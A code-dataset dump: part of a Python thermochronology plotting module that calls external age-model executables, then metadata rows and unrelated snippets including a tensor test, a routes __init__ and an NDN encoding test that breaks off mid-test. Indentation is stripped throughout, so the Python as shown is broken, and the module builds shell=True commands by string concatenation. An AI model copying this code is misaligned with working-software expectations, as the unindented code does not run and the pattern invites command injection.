if verbose:
print(
f"Cooling from {temp_max:.1f}°C at a rate of {rate:.1f} °C/Myr will require {start_time:.2f} million years"
)
# Calculate (U-Th)/He ages
command = (
rdaam_command
+ " "
+ tt_file
+ " "
+ str(ap_radius)
+ " "
+ str(ap_uranium)
+ " "
+ str(ap_thorium)
+ " "
+ str(zr_radius)
+ " "
+ str(zr_uranium)
+ " "
+ str(zr_thorium)
)
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for ages
stdout = p.stdout.readlines()
corr_ahe_age = stdout[0].split()[7].decode("UTF-8")
corr_zhe_age = stdout[1].split()[7].decode("UTF-8")
# Find closure temperatures from cooling ages and thermal history
tc_interp = interp1d([0.0, start_time], [0.0, temp_max])
ahe_tc = tc_interp(float(corr_ahe_age))
zhe_tc = tc_interp(float(corr_zhe_age))
# Add closure temperatures to lists
ahe_tc_list2.append(ahe_tc)
zhe_tc_list2.append(zhe_tc)
if verbose:
print(
f"AHe: {float(corr_ahe_age):.2f} Ma (Tc: {ahe_tc:.1f}°C); ZHe: {float(corr_zhe_age):.2f} Ma (Tc: {zhe_tc:.1f}°C)"
)
# Clean up temporary tt file
os.remove(tt_file)
# Plot only values for apatite (U-Th)/He
if plot_type == 1:
# --- Apatite cooling rate versus radius ---
# Create closure temperature contour lines
ap_contours_tc = ax[0].tricontour(
ap_x_list1,
ap_y_list1,
ahe_tc_list1,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[0].set_xscale("log")
# Add closure temperature contour labels
ax[0].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc1 = ax[0].tricontourf(
ap_x_list1,
ap_y_list1,
ahe_tc_list1,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc1.collections:
c.set_edgecolor("face")
# --- Apatite cooling rate versus eU plot ---
# Create closure temperature contour lines
ap_contours_tc = ax[1].tricontour(
ap_x_list2,
ap_y_list2,
ahe_tc_list2,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[1].set_xscale("log")
# Add closure temperature contour labels
ax[1].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc2 = ax[1].tricontourf(
ap_x_list2,
ap_y_list2,
ahe_tc_list2,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc2.collections:
c.set_edgecolor("face")
# Plot only values for zircon (U-Th)/He
elif plot_type == 2:
# --- Zircon cooling rate versus radius ---
# Create closure temperature contour lines
zr_contours_tc = ax[0].tricontour(
zr_x_list1,
zr_y_list1,
zhe_tc_list1,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[0].set_xscale("log")
# Add closure temperature contour labels
ax[0].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc1 = ax[0].tricontourf(
zr_x_list1,
zr_y_list1,
zhe_tc_list1,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc1.collections:
c.set_edgecolor("face")
# --- Zircon cooling rate versus eU plot ---
# Create closure temperature contour lines
zr_contours_tc = ax[1].tricontour(
zr_x_list2,
zr_y_list2,
zhe_tc_list2,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[1].set_xscale("log")
# Add closure temperature contour labels
ax[1].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc2 = ax[1].tricontourf(
zr_x_list2,
zr_y_list2,
zhe_tc_list2,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc2.collections:
c.set_edgecolor("face")
# Plot values for apatite and zircon (U-Th)/He
else:
# --- Apatite cooling rate versus radius ---
# Create closure temperature contour lines
ap_contours_tc = ax[0][0].tricontour(
ap_x_list1,
ap_y_list1,
ahe_tc_list1,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[0][0].set_xscale("log")
# Add closure temperature contour labels
ax[0][0].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc1 = ax[0][0].tricontourf(
ap_x_list1,
ap_y_list1,
ahe_tc_list1,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc1.collections:
c.set_edgecolor("face")
# --- Apatite cooling rate versus eU plot ---
# Create closure temperature contour lines
ap_contours_tc = ax[0][1].tricontour(
ap_x_list2,
ap_y_list2,
ahe_tc_list2,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[0][1].set_xscale("log")
# Add closure temperature contour labels
ax[0][1].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc2 = ax[0][1].tricontourf(
ap_x_list2,
ap_y_list2,
ahe_tc_list2,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc2.collections:
c.set_edgecolor("face")
# --- Zircon cooling rate versus radius plot ---
# Create closure temperature contour lines
zr_contours_tc = ax[1][0].tricontour(
zr_x_list1,
zr_y_list1,
zhe_tc_list1,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[1][0].set_xscale("log")
# Add closure temperature contour labels
ax[1][0].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc1 = ax[1][0].tricontourf(
zr_x_list1,
zr_y_list1,
zhe_tc_list1,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc1.collections:
c.set_edgecolor("face")
# --- Zircon cooling rate versus eU plot ---
# Create closure temperature contour lines
zr_contours_tc = ax[1][1].tricontour(
zr_x_list2,
zr_y_list2,
zhe_tc_list2,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[1][1].set_xscale("log")
# Add closure temperature contour labels
ax[1][1].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc2 = ax[1][1].tricontourf(
zr_x_list2,
zr_y_list2,
zhe_tc_list2,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc2.collections:
c.set_edgecolor("face")
# Format plot
# Apatite only
if plot_type == 1:
ax[0].set_title("Apatite (U-Th)/He closure temperature [°C]")
ax[1].set_title("Apatite (U-Th)/He closure temperature [°C]")
# Zircon only
elif plot_type == 2:
ax[0].set_title("Zircon (U-Th)/He closure temperature [°C]")
ax[1].set_title("Zircon (U-Th)/He closure temperature [°C]")
# Apatite and zircon
else:
ax[0][0].set_title("Apatite (U-Th)/He closure temperature [°C]")
ax[0][1].set_title("Apatite (U-Th)/He closure temperature [°C]")
ax[1][0].set_title("Zircon (U-Th)/He closure temperature [°C]")
ax[1][1].set_title("Zircon (U-Th)/He closure temperature [°C]")
# Apatite or Zircon
if plot_type < 3:
ax[0].set_xlabel("Cooling rate [°C/Myr]")
ax[1].set_xlabel("Cooling rate [°C/Myr]")
ax[0].set_ylabel("Equivalent spherical radius (µm)")
ax[1].set_ylabel("Effective uranium (ppm)")
# Apatite and zircon eU versus radius
else:
ax[0][0].set_xlabel("Cooling rate [°C/Myr]")
ax[0][1].set_xlabel("Cooling rate [°C/Myr]")
ax[0][0].set_ylabel("Equivalent spherical radius (µm)")
ax[0][1].set_ylabel("Effective uranium (ppm)")
ax[1][0].set_xlabel("Cooling rate [°C/Myr]")
ax[1][1].set_xlabel("Cooling rate [°C/Myr]")
ax[1][0].set_ylabel("Equivalent spherical radius (µm)")
ax[1][1].set_ylabel("Effective uranium (ppm)")
# Don't use scientific notation for x-axis
if plot_type < 3:
ax[0].xaxis.set_major_formatter(ScalarFormatter())
ax[1].xaxis.set_major_formatter(ScalarFormatter())
else:
ax[0][0].xaxis.set_major_formatter(ScalarFormatter())
ax[0][1].xaxis.set_major_formatter(ScalarFormatter())
ax[1][0].xaxis.set_major_formatter(ScalarFormatter())
ax[1][1].xaxis.set_major_formatter(ScalarFormatter())
# Use tight layout for subplots
plt.tight_layout()
# Save plot if requested
if save_plot:
# Set file name prefix
plot_filename = "rate_vs_radius_eu"
# Define plot filename based on type of plot and save plot
if plot_type == 1:
plot_savename = (
plot_filename + "_apatite_" + str(plot_dpi) + "dpi." + plot_file_format
)
elif plot_type == 2:
plot_savename = (
plot_filename + "_zircon_" + str(plot_dpi) + "dpi." + plot_file_format
)
else:
plot_savename = (
plot_filename
+ "_apatite_zircon_"
+ str(plot_dpi)
+ "dpi."
+ plot_file_format
)
plt.savefig(wd_orig + "/" + plot_savename, dpi=plot_dpi)
# Save plot if requested
if display_plot:
plt.show()
# Revert to original working directory
os.chdir(wd_orig)
return None
# Define function for creating plot of cooling rates
def rate_vs_age_tc(
num_points=101,
cooling_rate_min=0.1,
cooling_rate_max=100.0,
temp_max=350.0,
ap_u1=1.0,
ap_u2=20.0,
ap_u3=150.0,
zr_u1=10.0,
zr_u2=200.0,
zr_u3=4000.0,
ap_rad=45.0,
zr_rad=60.0,
ap_thorium=0.0,
zr_thorium=0.0,
ahe_uncertainty=0.1,
aft_uncertainty=0.2,
zhe_uncertainty=0.1,
plot_type=3,
plot_age_min=0.5,
plot_age_max=1800.0,
plot_tc_min=0.0,
plot_tc_max=200.0,
save_plot=False,
plot_file_format="pdf",
plot_dpi=300,
plot_style="seaborn-colorblind",
plot_alpha=0.6,
plot_grid=True,
display_plot=True,
clean_up_files=True,
verbose=False,
use_widget=False,
):
"""
Calculates thermochronometer ages and closure temperatures for different cooling rates and effective uranium
concentrations.
Parameters
----------
num_points : int, default=101
Number of points along x and y axes where ages/closure temperatures are
calculated.
cooling_rate_min : float, default=0.1
Minimum cooling rate in degrees C per Myr.
cooling_rate_max : float, default=100.0
Maximum cooling rate in degrees C per Myr.
temp_max : float, default=350.0
Max temperature for cooling history (in degrees C).
ap_u1 : float, default=1.0
Apatite uranium concentration in ppm for upper plot panel.
ap_u2 : float, default=10.0
Apatite uranium concentration in ppm for middle plot panel.
ap_u3 : float, default=150.0
Apatite uranium concentration in ppm for lower plot panel.
zr_u1 : float, default=10.0
Zircon uranium concentration in ppm for upper plot panel.
zr_u2 : float, default=200.0
Zircon uranium concentration in ppm for middle plot panel.
zr_u3 : float, default=4000.0
Zircon uranium concentration in ppm for lower plot panel.
ap_rad : float, default=45.0
Apatite equivalent spherical grain radius in micrometers.
zr_rad : float, default=60.0
Zircon equivalent spherical grain radius in micrometers.
ap_thorium : float, default=0.0
Apatite thorium concentration in ppm.
zr_thorium : float, default=0.0
Zircon thorium concentration in ppm.
ahe_uncertainty : float, default=0.1
Apatite (U-Th)/He age uncertainty fraction (0.1 = 10%)
aft_uncertainty : float, default=0.2
Apatite fission-track age uncertainty fraction (0.2 = 20%)
zhe_uncertainty : float, default=0.1
Zircon (U-Th)/He age uncertainty fraction (0.1 = 10%)
plot_type : int, default=3
1 = Cooling rate versus closure temperature
2 = Cooling rate versus age
3 = Cooling rate versus age and closure temperature
plot_age_min : float, default=0.5
Minimum age value in Ma for plots of cooling rate versus age. Only applies to plot_type 2 and 3.
plot_age_max : float, default=1800.0
Maximum age value in Ma for plots of cooling rate versus age. Only applies to plot_type 2 and 3.
plot_tc_min : float, default=0.0
Minimum closure temperature value in deg. C for plots of cooling rate versus closure temperature.
Only applies to plot_type 1 and 3.
plot_tc_max : float, default=200.0
Maximum closure temperature value in deg. C for plots of cooling rate versus closure temperature.
Only applies to plot_type 1 and 3.
save_plot : bool, default=False
Flag for whether to save the plot to a file.
plot_file_format : str, default='pdf'
File format for saving plot to file (examples: png, pdf, svg, eps).
plot_dpi : int, default=300
Saved plot resolution in dots per inch.
plot_style : str, default='seaborn-colorblind'
Style sheet used for plotting. See https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html.
plot_alpha : float, default=0.6
Transparency used for plotting fill colors for age swath plots.
plot_grid : bool, default=True
Flag for whether or not to display the plot grid lines.
display_plot : bool, default=True
Flag for whether to display the plot.
clean_up_files : bool, default=True
Flag for whether to delete temporary output files after the code has run.
verbose : bool, default=False
Enable/disable verbose output.
use_widget : bool, default=False
Enable/disable IPython progress bar widget. Disabled for command-line usage.
Returns
-------
None
"""
# Check to see whether ipywidgets and IPython are available for widget use
# If not, disable widgets and display a warning
if use_widget:
try:
import ipywidgets as widgets
except ModuleNotFoundError:
print("Warning: ipywidgets module not found. Disabling graphical progress bar.")
use_widget = False
if use_widget:
try:
from IPython.display import display
except ModuleNotFoundError:
print(
"Warning: IPython.display module not found. Disabling graphical progress bar."
)
use_widget = False
# Ensure relative paths work by setting working dir to dir containing this script file
wd_orig = os.getcwd()
script_path = os.path.abspath(__file__)
dir_name = os.path.dirname(script_path)
os.chdir(dir_name)
# Make lists for apatite and zircon uranium concentrations
ap_u_list = [ap_u1, ap_u2, ap_u3]
zr_u_list = [zr_u1, zr_u2, zr_u3]
# Set plot file name prefix
if plot_type == 1:
plot_filename = "rate_vs_tc"
elif plot_type == 2:
plot_filename = "rate_vs_age"
elif plot_type == 3:
plot_filename = "rate_vs_age_tc"
else:
raise ValueError("Bad value for plot_type. Must be 1, 2, or 3.")
# Define cooling rates to consider
rates = np.logspace(
start=np.log10(cooling_rate_min),
stop=np.log10(cooling_rate_max),
num=num_points,
)
# Plot titles
title_list = [
f"Low eU (ap={ap_u_list[0]:.1f}, zr={zr_u_list[0]:.1f} ppm)",
f"Intermediate eU (ap={ap_u_list[1]:.1f}, zr={zr_u_list[1]:.1f} ppm)",
f"High eU (ap={ap_u_list[2]:.1f}, zr={zr_u_list[2]:.1f} ppm)",
]
# Define time-temperature history filename
tt_file = "simple_time_temp.txt"
# Get age calculation executable(s) to use
rdaam_command = get_tc_exec("RDAAM_He")
ketch_command = get_tc_exec("ketch_aft")
# Calculate total number of models that will be run
total_models = len(ap_u_list) * len(rates)
# Set model type string
if plot_type == 1:
model_type = "cooling rate versus closure temperature"
elif plot_type == 2:
model_type = "cooling rate versus age"
elif plot_type == 3:
model_type = "cooling rate versus age and closure temperature"
# Set plot style
plt.style.use(plot_style)
# Create figure
if plot_type == 3:
fig, ax = plt.subplots(3, 2, figsize=(12, 10))
else:
fig, ax = plt.subplots(3, 1, figsize=(6, 10))
# Create visual progress bar, if enabled
if use_widget and not verbose:
s = widgets.IntProgress(
value=0,
min=0,
max=total_models,
description="Calculating:",
bar_style="", # 'success', 'info', 'warning', 'danger' or ''
style={"bar_color": "#ff6666"},
orientation="horizontal",
)
display(s)
# Loop over plots/plot pairs
model_count = 0
for i in range(len(ap_u_list)):
ap_uranium = ap_u_list[i]
zr_uranium = zr_u_list[i]
# Create lists for plotables
rate_list = []
ahe_tc_list = []
aft_tc_list = []
zhe_tc_list = []
ahe_age_list = []
aft_age_list = []
zhe_age_list = []
for rate in rates:
model_count += 1
if not verbose:
if use_widget:
s.value = model_count
else:
print(
f"Calculating {model_type} - {int(round(100 * model_count / total_models)):3d}% ({model_count:5d} / {total_models:5d})\r",
end="",
)
# Define thermal history
start_time = temp_max / rate
with open(tt_file, "w") as f:
f.write("0.0,0.0\n")
f.write("{0:.4f},{1:.1f}".format(start_time, temp_max))
# Calculate He ages
command = (
rdaam_command
+ " "
+ tt_file
+ " "
+ str(ap_rad)
+ " "
+ str(ap_uranium)
+ " "
+ str(ap_thorium)
+ " "
+ str(zr_rad)
+ " "
+ str(zr_uranium)
+ " "
+ str(zr_thorium)
)
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for ages
stdout = p.stdout.readlines()
corr_ahe_age = stdout[0].split()[7].decode("UTF-8")
corr_zhe_age = stdout[1].split()[7].decode("UTF-8")
# Calculate AFT age
command = ketch_command + " " + tt_file
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for AFT age
stdout = p.stdout.readlines()
aft_age = stdout[0].split()[4][:-1].decode("UTF-8")
# Use predicted ages to get closure temperature
tc_interp = interp1d([0.0, start_time], [0.0, temp_max])
ahe_tc = tc_interp(float(corr_ahe_age))
aft_tc = tc_interp(float(aft_age))
zhe_tc = tc_interp(float(corr_zhe_age))
# Add current iteration values to plotable lists
rate_list.append(rate)
ahe_tc_list.append(ahe_tc)
aft_tc_list.append(aft_tc)
zhe_tc_list.append(zhe_tc)
ahe_age_list.append(float(corr_ahe_age))
aft_age_list.append(float(aft_age))
zhe_age_list.append(float(corr_zhe_age))
# Echo ages for this iteration
if verbose:
print(
f"AHe: {float(corr_ahe_age):.2f} Ma (Tc: {ahe_tc:.1f}°C); AFT: {float(aft_age):.2f} Ma (Tc: {aft_tc:.1f}°C); ZHe: {float(corr_zhe_age):.2f} Ma (Tc: {zhe_tc:.1f}°C) -- total time: {start_time:.1f} Myr"
)
# Assign uncertainties if plotting ages
if plot_type != 1:
# Calculate age min and max values using given uncertainties
ahe_age_min = np.array(ahe_age_list) * (1.0 - ahe_uncertainty)
ahe_age_max = np.array(ahe_age_list) * (1.0 + ahe_uncertainty)
aft_age_min = np.array(aft_age_list) * (1.0 - aft_uncertainty)
aft_age_max = np.array(aft_age_list) * (1.0 + aft_uncertainty)
zhe_age_min = np.array(zhe_age_list) * (1.0 - zhe_uncertainty)
zhe_age_max = np.array(zhe_age_list) * (1.0 + zhe_uncertainty)
# Create plots for rate versus closure temperature
if plot_type == 1:
ax[i].semilogx(rate_list, ahe_tc_list, label="Apatite (U-Th)/He")
ax[i].semilogx(rate_list, aft_tc_list, label="Apatite FT")
ax[i].semilogx(rate_list, zhe_tc_list, label="Zircon (U-Th)/He")
# Create plots for rate versus age
if plot_type == 2:
ax[i].fill_between(
rate_list,
ahe_age_min,
ahe_age_max,
alpha=plot_alpha,
label=f"Apatite (U-Th)/He age ± {ahe_uncertainty * 100:.0f}%",
)
ax[i].fill_between(
rate_list,
aft_age_min,
aft_age_max,
alpha=plot_alpha,
label=f"Apatite FT age ± {aft_uncertainty * 100:.0f}%",
)
ax[i].fill_between(
rate_list,
zhe_age_min,
zhe_age_max,
alpha=plot_alpha,
label=f"Zircon (U-Th)/He age ± {zhe_uncertainty * 100:.0f}%",
)
# Scale axes
ax[i].set_xscale("log")
ax[i].set_yscale("log")
# Create plots for rate versus age and closure temperature
if plot_type == 3:
# Plot ages and closure temperatures (low eU)
ax[i][0].fill_between(
rate_list,
ahe_age_min,
ahe_age_max,
alpha=plot_alpha,
label=f"Apatite (U-Th)/He age ± {ahe_uncertainty * 100:.0f}%",
)
ax[i][1].plot(rate_list, ahe_tc_list, label="Apatite (U-Th)/He")
# Plot ages and closure temperatures (intermediate eU)
ax[i][0].fill_between(
rate_list,
aft_age_min,
aft_age_max,
alpha=plot_alpha,
label=f"Apatite FT age ± {aft_uncertainty * 100:.0f}%",
)
ax[i][1].plot(rate_list, aft_tc_list, label="Apatite FT")
# Plot ages and closure temperatures (high eU)
ax[i][0].fill_between(
rate_list,
zhe_age_min,
zhe_age_max,
alpha=plot_alpha,
label=f"Zircon (U-Th)/He age ± {zhe_uncertainty * 100:.0f}%",
)
ax[i][1].plot(rate_list, zhe_tc_list, label="Zircon (U-Th)/He")
# Set axis scalings
ax[i][0].set_xscale("log")
ax[i][0].set_yscale("log")
ax[i][1].set_xscale("log")
# Format axis tick labels
if plot_type == 3:
ax[i][0].xaxis.set_major_formatter(ScalarFormatter())
ax[i][1].xaxis.set_major_formatter(ScalarFormatter())
ax[i][0].yaxis.set_major_formatter(ScalarFormatter())
else:
ax[i].xaxis.set_major_formatter(ScalarFormatter())
ax[i].yaxis.set_major_formatter(ScalarFormatter())
# Set axis range and add axis labels
if plot_type == 1:
ax[i].set_xlim([cooling_rate_min, cooling_rate_max])
ax[i].set_ylim([plot_tc_min, plot_tc_max])
ax[i].set_ylabel("Closure temperature (°C)")
if i == 2:
ax[i].set_xlabel("Cooling rate (°C/Myr)")
# Set axis range and add axis labels
if plot_type == 2:
ax[i].set_xlim([cooling_rate_min, cooling_rate_max])
ax[i].set_ylim([plot_age_min, plot_age_max])
ax[i].set_ylabel("Age (Ma)")
if i == 2:
ax[i].set_xlabel("Cooling rate (°C/Myr)")
# Set axis ranges and add axis labels
if plot_type == 3:
ax[i][0].set_xlim([cooling_rate_min, cooling_rate_max])
ax[i][0].set_ylim([plot_age_min, plot_age_max])
ax[i][1].set_xlim([cooling_rate_min, cooling_rate_max])
ax[i][1].set_ylim([plot_tc_min, plot_tc_max])
ax[i][0].set_ylabel("Age (Ma)")
ax[i][1].set_ylabel("Closure temperature (°C)")
if i == 2:
ax[i][0].set_xlabel("Cooling rate (°C/Myr)")
ax[i][1].set_xlabel("Cooling rate (°C/Myr)")
# Add subplot titles
if plot_type == 3:
ax[i][0].set_title(title_list[i])
ax[i][1].set_title(title_list[i])
else:
ax[i].set_title(title_list[i])
# Enable/disable gridlines
if plot_grid:
if plot_type == 3:
ax[i][0].grid(visible=True)
ax[i][1].grid(visible=True)
else:
ax[i].grid(visible=True)
else:
if plot_type == 3:
ax[i][0].grid(visible=False)
ax[i][1].grid(visible=False)
else:
ax[i].grid(visible=False)
# Add legend
if plot_type == 3:
ax[i][0].legend()
ax[i][1].legend()
else:
ax[i].legend()
# Delete temporary tt file
if clean_up_files:
os.remove(tt_file)
os.remove("ft_length.csv")
# Use tight layout
plt.tight_layout()
# Save plot if requested
if save_plot:
# Define plot filename and save plot
plot_filename = plot_filename + "_" + str(plot_dpi) + "dpi." + plot_file_format
plt.savefig(wd_orig + "/" + plot_filename, dpi=plot_dpi)
# Show plot if requested
if display_plot:
plt.show()
# Revert to original working directory
os.chdir(wd_orig)
return None
| 34.311728 | 220 | 0.586564 | 8,977 | 66,702 | 4.152389 | 0.056478 | 0.025968 | 0.024144 | 0.019959 | 0.848455 | 0.814626 | 0.78238 | 0.75676 | 0.723951 | 0.691169 | 0 | 0.026678 | 0.320575 | 66,702 | 1,943 | 221 | 34.329388 | 0.79481 | 0.314323 | 0 | 0.658197 | 0 | 0.011475 | 0.118924 | 0.008353 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004918 | false | 0.00082 | 0.011475 | 0 | 0.021311 | 0.013934 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
423765663e86f9b54dcaace491c71c52f7fbc487 | 131 | py | Python | tests/learnergy/visual/test_tensor.py | anukaal/learnergy | 704fc2b3fcb80df41ed28d750dc4e6475df23315 | [
"Apache-2.0"
] | 39 | 2020-02-27T00:47:45.000Z | 2022-03-28T14:57:26.000Z | tests/learnergy/visual/test_tensor.py | anukaal/learnergy | 704fc2b3fcb80df41ed28d750dc4e6475df23315 | [
"Apache-2.0"
] | 5 | 2021-05-11T08:23:37.000Z | 2022-01-20T12:50:59.000Z | tests/learnergy/visual/test_tensor.py | anukaal/learnergy | 704fc2b3fcb80df41ed28d750dc4e6475df23315 | [
"Apache-2.0"
] | 6 | 2020-04-15T00:23:13.000Z | 2022-01-29T16:22:05.000Z | import torch
from learnergy.visual import tensor
def test_show_tensor():
t = torch.zeros(28, 28)
tensor.show_tensor(t)
| 13.1 | 35 | 0.717557 | 20 | 131 | 4.55 | 0.6 | 0.21978 | 0.241758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037736 | 0.19084 | 131 | 9 | 36 | 14.555556 | 0.820755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
429f38443b1a508db9b8162d08534dfe1d6b5446 | 99 | py | Python | mitmirror/main/routes/__init__.py | Claayton/mitmirror-api | a78ec3aa84aa3685a26bfaf5e1ba2a3f0f8405d1 | [
"MIT"
] | null | null | null | mitmirror/main/routes/__init__.py | Claayton/mitmirror-api | a78ec3aa84aa3685a26bfaf5e1ba2a3f0f8405d1 | [
"MIT"
] | 1 | 2021-10-09T20:42:03.000Z | 2021-10-09T20:42:03.000Z | mitmirror/main/routes/__init__.py | Claayton/mitmirror-api | a78ec3aa84aa3685a26bfaf5e1ba2a3f0f8405d1 | [
"MIT"
] | null | null | null | """Inicializacao do modulo routes"""
from .users_routes import users
from .auth_routes import auth
| 24.75 | 36 | 0.79798 | 14 | 99 | 5.5 | 0.571429 | 0.311688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 99 | 3 | 37 | 33 | 0.885057 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6732b42dce2262de2e645552dcc98a01c5aaf093 | 91 | py | Python | function.py | bconti123/Python-Practice | 207e9108ef80841fb96ba32a3ec46f5c962e3399 | [
"MIT"
] | null | null | null | function.py | bconti123/Python-Practice | 207e9108ef80841fb96ba32a3ec46f5c962e3399 | [
"MIT"
] | null | null | null | function.py | bconti123/Python-Practice | 207e9108ef80841fb96ba32a3ec46f5c962e3399 | [
"MIT"
] | null | null | null |
def bryant():
print("Hey Bryant!!!")
print("You're awesome!!!")
bryant() | 15.166667 | 31 | 0.505495 | 10 | 91 | 4.6 | 0.7 | 0.478261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274725 | 91 | 6 | 32 | 15.166667 | 0.69697 | 0 | 0 | 0 | 0 | 0 | 0.348837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0 | 0 | 0.25 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
674095f2e116c3d63a2396277fc614d244a605a2 | 19,759 | py | Python | tests/encoding/ndn_format_0_3_test.py | Zhiyi-Zhang/python-ndn | b05ed72dc7f0190e015edecf81d8949fb2eefe64 | [
"Apache-2.0"
] | null | null | null | tests/encoding/ndn_format_0_3_test.py | Zhiyi-Zhang/python-ndn | b05ed72dc7f0190e015edecf81d8949fb2eefe64 | [
"Apache-2.0"
] | null | null | null | tests/encoding/ndn_format_0_3_test.py | Zhiyi-Zhang/python-ndn | b05ed72dc7f0190e015edecf81d8949fb2eefe64 | [
"Apache-2.0"
] | null | null | null | # -----------------------------------------------------------------------------
# Copyright (C) 2019 Xinyu Ma
#
# This file is part of python-ndn.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
import hashlib
import pytest
from typing import List
from ndn.security import DigestSha256Signer
from ndn.encoding import Name, Component, InterestParam, MetaInfo, ContentType, SignatureType, \
make_interest, make_data, parse_interest, parse_data, DecodeError, Signer, VarBinaryStr
class TestInterestMake:
@staticmethod
def test_default():
name = Name.from_str('/local/ndn/prefix')
interest = make_interest(name, InterestParam())
assert interest == b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'
name = Name.encode(name)
interest = make_interest(name, InterestParam())
assert interest == b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'
name = '/local/ndn/prefix'
interest = make_interest(name, InterestParam())
assert interest == b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'
@staticmethod
def test_interest_params():
name = '/local/ndn/prefix'
int_param = InterestParam()
int_param.can_be_prefix = True
int_param.must_be_fresh = True
int_param.hop_limit = 1
int_param.nonce = 0
int_param.lifetime = 10
interest = make_interest(name, int_param)
assert (interest == b'\x05\x26\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x21\x00\x12\x00\x0a\x04\x00\x00\x00\x00\x0c\x01\x0a\x22\x01\x01')
@staticmethod
def test_mixed_name():
name = ['local', Component.from_str('ndn'), 'prefix']
interest = make_interest(name, InterestParam())
assert interest == b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'
@staticmethod
def test_app_param():
name = '/local/ndn/prefix'
app_param = b'\x01\x02\x03\x04'
